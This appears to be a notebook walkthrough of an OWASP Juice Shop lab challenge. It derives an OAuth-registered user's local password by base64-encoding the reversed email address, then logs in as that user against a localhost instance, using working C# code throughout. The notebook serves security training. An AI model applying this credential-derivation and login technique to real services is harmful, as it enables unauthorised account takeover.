# Login OAuth account
Apparently the juice shop allows logging in with third party identity provider (Google), leveraging OAuth. However this combined with local username and password accounts could expose potential design flaws. Especially when it comes to generating passwords for OAuth registered accounts. Let's investigate this.

In [ ]:
using System.Linq;
using System.Net.Http;
using System.Net.Http.Headers;

// base url for all calls
const string BASE_URL = "http://localhost:3000/";
var BASE_URI = new Uri(BASE_URL); 

In [ ]:
#!value --name json
{
    "email": "USERNAME",
    "password": "PWD"
}

## Investigate password generation
After having investigated the main.js file it's apparent that an account returned from OAuth registration still creates a local account with the email adress and a generated password. The javascript function btoa(...) is leveraged to generate the password based on the reversed string of the email adress.

In [ ]:
#!share json --from value

var email = "bjoern.kimminich@gmail.com";
json = json.Replace("USERNAME", email);
var reversedEmail = new string(email.Reverse().ToArray());
var reversedEmailBytes = System.Text.Encoding.UTF8.GetBytes(reversedEmail);
var password = System.Convert.ToBase64String(reversedEmailBytes);
json = json.Replace("PWD", password);

Console.WriteLine(json);

Now let's see if we can leverage that as loca credentials to login the OAuth user.

In [ ]:
using(var client = new HttpClient()) {
    var content = new StringContent(json, Encoding.UTF8, "application/json");
    var uri = new Uri(BASE_URI, "rest/user/login");
    var response = await client.PostAsync(uri, content);
    response.EnsureSuccessStatusCode();

    Console.WriteLine(response.StatusCode);
}